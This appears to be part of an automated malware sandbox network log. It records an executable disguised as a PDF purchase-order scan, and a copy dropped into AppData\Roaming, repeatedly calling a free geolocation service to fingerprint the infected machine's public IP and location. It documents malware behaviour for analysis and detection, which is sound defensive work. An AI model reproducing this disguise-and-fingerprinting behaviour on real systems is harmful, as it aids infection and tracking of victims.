2024-10-25 07:17:13 UTC	892	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 07:17:13 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 309 Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bOu2aox8NQwcIEaY1CzJGuBaL%2B86uTAPpCw79VKTERxhobTo55TRvI66c8leowIWJ4FRB7EwVd8RqyIPCo5eqMhTyIMzQjGS2Djc09fQ%2FYfXYQugWvA8vg0ZvW5gs84aOfcxT%2Fko"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d806cf83ded3ac2-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1095&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2485836&cwnd=251&unsent_bytes=0&cid=c6af47a9a7500c88&ts=157&x=0"
2024-10-25 07:17:13 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-25 07:17:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49717	188.114.97.3	443	2788	C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-25 07:17:15 UTC	87	OUT	GET /xml/173.254.250.81 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-25 07:17:15 UTC	888	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 07:17:15 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 311 Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BUkPKcUuSxDudoV3vKTe2QcG6qNSsW2Q9a6xDvaZ7%2BdNSeKRWJChcjwbOK7Z3WGqsJtbyOb9Efsde54661qgV5lW0S6PqQeU2lsKPqpCVM6ooc5NjGCrw9rmRRRTekQnEbRgavWQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d806d026ba5e776-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1044&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2696461&cwnd=249&unsent_bytes=0&cid=44b2d68427be880b&ts=147&x=0"
2024-10-25 07:17:15 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-25 07:17:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49718	188.114.97.3	443	4568	C:\Users\user\AppData\Roaming\QeSBxb.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-25 07:17:15 UTC	87	OUT	GET /xml/173.254.250.81 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-25 07:17:15 UTC	894	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 07:17:15 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 311 Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jze%2BHBhFsOih24JdfDKqk32YHt1BIQuyzGCjvLpfdKvO6RAXeZewengvi2%2F9zscOwz81fWnNWw%2BzDKiFflsE57ChyGubB4Pfw5%2BdoXaXzDF2bxV2kpOvFqsH3hvfrNVSjKRWojaO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d806d0438d3345e-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1291&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2167664&cwnd=251&unsent_bytes=0&cid=c5df08c43e83f54c&ts=251&x=0"
2024-10-25 07:17:15 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-25 07:17:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49720	188.114.97.3	443	4568	C:\Users\user\AppData\Roaming\QeSBxb.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-25 07:17:16 UTC	63	OUT	GET /xml/173.254.250.81 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-25 07:17:16 UTC	898	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 07:17:16 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 312 Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o0%2FiPniqzvtQig1n29TcdYn3Sq3%2FG%2BUWHja9q5PrJ4lCTLVMdHeSCbwh6%2BElEoutduC8nnr2HsHUBTaaNKb6MSZ%2FBp5YXavUMGXXUvYFDwr2oAlaxYbEuwIGkdA%2FPVKmON0SwfRW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d806d0aab0f6b7d-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2184&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=1303917&cwnd=215&unsent_bytes=0&cid=822ce8857e5b9e69&ts=146&x=0"
2024-10-25 07:17:16 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-25 07:17:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49721	188.114.97.3	443	2788	C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-25 07:17:16 UTC	63	OUT	GET /xml/173.254.250.81 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-25 07:17:17 UTC	898	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 07:17:16 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 312 Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BepxfvEMvxzv7oqPJGB3PBy0DyCOeCJz%2BFJ41x%2BHXjYd%2FXLGOsWd06bnE4z9KA%2BMbtZvn9%2FplmHCSxoVmh9RZMOJWlNYQFh2A9%2B4mRt0LVItheRsQdksE3KkFnh4oPLvVgMWCiUP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d806d0ce9c76c25-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1861&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=1498964&cwnd=251&unsent_bytes=0&cid=acfae2698219fa41&ts=143&x=0"
2024-10-25 07:17:17 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-25 07:17:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49724	188.114.97.3	443	4568	C:\Users\user\AppData\Roaming\QeSBxb.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-25 07:17:18 UTC	87	OUT	GET /xml/173.254.250.81 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-25 07:17:18 UTC	898	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 07:17:18 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 314 Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4RZoc7dhyuGKHkC%2F%2BdUM%2BfW7YE9wKYM5BcboUjSf6AR3ulvwE4qbD8xDOAGq%2FIe1lfAGL4HZEN4MPyyWtYLOSmfVc8TvRt%2BAFTYLfZznLhSRi1ZV%2BvmgfrwnFlTVyNJVEyovEBHM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d806d14f88a6b17-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1050&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2758095&cwnd=250&unsent_bytes=0&cid=2b7c43188408270c&ts=148&x=0"
2024-10-25 07:17:18 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-25 07:17:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49725	188.114.97.3	443	2788	C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-25 07:17:18 UTC	87	OUT	GET /xml/173.254.250.81 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-25 07:17:18 UTC	896	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 07:17:18 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 314 Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4piYN5J9YLwjDzJFO3JTxl6%2Fs%2Fs2XM3xJc3BsJL44COz8rVWpEUO9LkSXGPCrMP9wnv7v8fzi5nl8x%2FVKpC9Kou41pzi%2BQo8mg32C%2BIl4XdGeYyikYoWnmbI5hHFnh6ROVuSqqHe"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d806d174c7b3aac-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1170&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2331723&cwnd=245&unsent_bytes=0&cid=8c1a73b88c3ea3cb&ts=161&x=0"
2024-10-25 07:17:18 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-25 07:17:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49729	188.114.97.3	443	2788	C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-25 07:17:20 UTC	87	OUT	GET /xml/173.254.250.81 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-25 07:17:20 UTC	894	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 07:17:20 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 316 Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9xZQfhFwAF1yIxU%2F1GezVlpH82a7dF8hD1HM5IhO1ZZ9A7RaDWzlczjuKsz4qixSXBsw%2BssBHRXmCXm0I4SsdpKN7m5bQCpD3A%2F8J3mEAvtlhIrL1YPGONId9W3fse%2FbtjAteUAi"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d806d24cd8f6b89-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1951&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1471544&cwnd=251&unsent_bytes=0&cid=e32fc79699601d3f&ts=665&x=0"
2024-10-25 07:17:20 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-25 07:17:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	49728	188.114.97.3	443	4568	C:\Users\user\AppData\Roaming\QeSBxb.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-25 07:17:20 UTC	63	OUT	GET /xml/173.254.250.81 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-25 07:17:20 UTC	895	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 07:17:20 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 316 Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tv3xdVj5ocna8aoH435DgkPDzfLJJT7rAdc7TbqiRfPOHDvYnbl%2BkIfa2FIxqaqxlCoDZC%2BkUS5qksuqX5ibgTfZUIoF2livEnukouE6g4vJe%2BUgA4hdTXLQU93sEKqMS%2FFoCMny"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d806d24cca6e702-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1333&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2127847&cwnd=251&unsent_bytes=0&cid=2f21e09c63582be2&ts=1051&x=0"
2024-10-25 07:17:20 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-25 07:17:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.8	49733	188.114.97.3	443	4568	C:\Users\user\AppData\Roaming\QeSBxb.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-25 07:17:22 UTC	87	OUT	GET /xml/173.254.250.81 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-25 07:17:22 UTC	899	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 07:17:22 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 318 Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DHYnJk655cpow8i%2FAYJbG3vF8unGuHyeW4J6MSNzBnZQppObq19t47k7jerdKu%2FV1esI%2F%2BC1%2BGSYTSYpde%2B6Cf7M4HD%2BNIGPTpUSfATtZLsWpNSSOWW1SgGNICnuSmqcOBRrXAbF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d806d2f5eac4648-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1163&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2468883&cwnd=32&unsent_bytes=0&cid=881db09a2d9d3de9&ts=146&x=0"
